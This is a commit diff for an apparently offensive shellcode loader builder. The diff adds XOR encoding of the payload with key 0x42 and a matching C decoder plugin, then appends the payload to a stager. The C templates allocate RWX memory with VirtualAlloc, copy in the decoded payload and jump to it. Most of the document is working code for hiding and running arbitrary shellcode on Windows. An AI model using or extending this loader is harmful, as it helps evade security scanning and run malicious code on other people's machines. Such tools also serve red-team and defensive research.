feature: xor'd payload

phases/asmtoshc.py

@@ -1,8 +1,11 @@
 import pefile
 import pprint
 
+from model import *
 from helper import *
 from config import config
+from observer import observer
+from project import project
 
 
 def make_shc_from_asm(asm_file, exe_file, shc_file):
@@ -27,3 +30,27 @@ def make_shc_from_asm(asm_file, exe_file, shc_file):
 
     return code
     #print("---[ Shellcode from {} written to: {}  (size: {}) ]".format(exe_file, shc_file, len(code)))
+
+
+def merge_loader_payload(main_shc_file):
+    print("--[ Merge stager: {} + {} -> {} ] ".format(
+        main_shc_file, project.payload, main_shc_file))
+    with open(main_shc_file, 'rb') as input1:
+        data_stager = input1.read()
+    with open(project.payload, 'rb') as input2:
+        data_payload = input2.read()
+
+    if project.decoder_style == DecoderStyle.PLAIN_1:
+        pass
+    elif project.decoder_style == DecoderStyle.XOR_1:
+        xor_key = 0x42
+        print("---[ XOR payload with key 0x{:x}".format(xor_key))
+        data_payload = bytes([byte ^ xor_key for byte in data_payload])
+
+    print("---[ Size: Stager: {} and Payload: {}  Sum: {} ]".format(
+        len(data_stager), len(data_payload), len(data_stager)+len(data_payload)))
+
+    with open(main_shc_file, 'wb') as output:
+        data = data_stager + data_payload
+        output.write(data)
+        observer.add_code("final_shellcode", data) 

phases/ctoasm.py

@@ -4,12 +4,13 @@ import os
 import pprint
 from observer import observer
 from jinja2 import Template
-from project import project
 
+from project import project
 from model import *
 
 use_templates = True
 
+
 def create_c_from_template():
     plugin_allocator = ""
     plugin_decoder = ""
@@ -18,8 +19,12 @@ def create_c_from_template():
     with open("plugins/allocator/rwx_1.c", "r", encoding='utf-8') as file:
         plugin_allocator = file.read()
 
-    with open("plugins/decoder/plain_1.c", "r", encoding='utf-8') as file:
-        plugin_decoder = file.read()
+    if project.decoder_style == DecoderStyle.PLAIN_1:
+        with open("plugins/decoder/plain_1.c", "r", encoding='utf-8') as file:
+            plugin_decoder = file.read()
+    elif project.decoder_style == DecoderStyle.XOR_1:
+        with open("plugins/decoder/xor_1.c", "r", encoding='utf-8') as file:
+            plugin_decoder = file.read()
 
     with open("plugins/executor/direct_1.c", "r", encoding='utf-8') as file:
         plugin_executor = file.read()
@@ -115,8 +120,6 @@ def make_c_to_asm(c_file, asm_file, payload_len, capabilities: ExeCapabilities):
         shutil.move(asm_clean_file, asm_file)
         asm["cleanup"] = file_readall_text(asm_file)
 
-
-
     return asm
 
 
@@ -171,7 +174,7 @@ def fixup_asm_file(filename, payload_len, capabilities: ExeCapabilities):
     for idx, line in enumerate(lines): 
         if "11223344" in lines[idx]:
             print("    > Replace payload length at line: {}".format(idx))
-            lines[idx] = lines[idx].replace("11223344", str(payload_len+1))
+            lines[idx] = lines[idx].replace("11223344", str(payload_len))
             break
             
     # add label at end of code
@@ -179,7 +182,6 @@ def fixup_asm_file(filename, payload_len, capabilities: ExeCapabilities):
         if lines[idx].startswith("END"):
             print("    > Add end of code label at line: {}".format(idx))
             lines.insert(idx-1, "shcstart:\r\n")
-            lines.insert(idx, "\tnop\r\n")
             break
     
     with open(filename, 'w') as asmfile:

plugins/allocator/rwx_1.c

@@ -1 +1 @@
-char *dest = VirtualAlloc(NULL, 4096, 0x3000, 0x40);
+    char *dest = VirtualAlloc(NULL, 4096, 0x3000, 0x40);

plugins/decoder/plain_1.c

@@ -1,3 +1,3 @@
-for(int n=0; n<11223344; n++) {
-    dest[n] = supermega_payload[n];
-}
+    for (int n=0; n<11223344; n++) {
+        dest[n] = supermega_payload[n];
+    }

plugins/decoder/xor_1.c

@@ -1,3 +1,4 @@
-for (i=0; i<11223344; i++){
-    dest[i] = supermega_payload[i] ^ 0x42;
-}
+    for (int n=0; n<11223344; n++){
+        dest[n] = supermega_payload[n];
+        dest[n] = dest[n] ^ 0x42;
+    }

plugins/executor/direct_1.c

@@ -1 +1 @@
-(*(void(*)())(dest))();
+    (*(void(*)())(dest))();

source/iat_reuse/template.c

@@ -18,16 +18,16 @@ int main()
 
 	// Allocate RWX segment
     // char *dest = ...
-    {{ plugin_allocator }}
+{{ plugin_allocator }}
 
 	// Copy
 	// from: supermega_payload[]
 	// to:   dest[]
     // len:  0x11223344
-    {{ plugin_decoder }}
+{{ plugin_decoder }}
 
     // Execute *dest
-    {{ plugin_executor }}
+{{ plugin_executor }}
 
 	return 0;
 }

supermega.py

@@ -135,19 +135,7 @@ def start():
 
     # Merge shellcode/loader with payload
     if project.dataref_style == DataRefStyle.APPEND:
-        print("--[ Merge stager: {} + {} -> {} ] ".format(
-            main_shc_file, project.payload, main_shc_file))
-        with open(main_shc_file, 'rb') as input1:
-            data_stager = input1.read()
-        with open(project.payload, 'rb') as input2:
-            data_payload = input2.read()
-        print("---[ Size: Stager: {} and Payload: {}  Sum: {} ]".format(
-            len(data_stager), len(data_payload), len(data_stager)+len(data_payload)))
-
-        with open(main_shc_file, 'wb') as output:
-            data = data_stager + data_payload
-            output.write(data)
-            observer.add_code("final_shellcode", data)
+        merge_loader_payload(main_shc_file)
 
         if project.verify and project.source_style == SourceStyle.peb_walk:
             print("--[ Verify final shellcode ]")
@@ -180,9 +168,9 @@ def start():
             ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
 
     # dump the info i gathered
-    file = open('latest.pickle', 'wb')
-    pickle.dump(data, file)
-    file.close()
+    #file = open('latest.pickle', 'wb')
+    #pickle.dump(data, file)
+    #file.close()
 
     # delete files
     if project.cleanup_files_on_exit: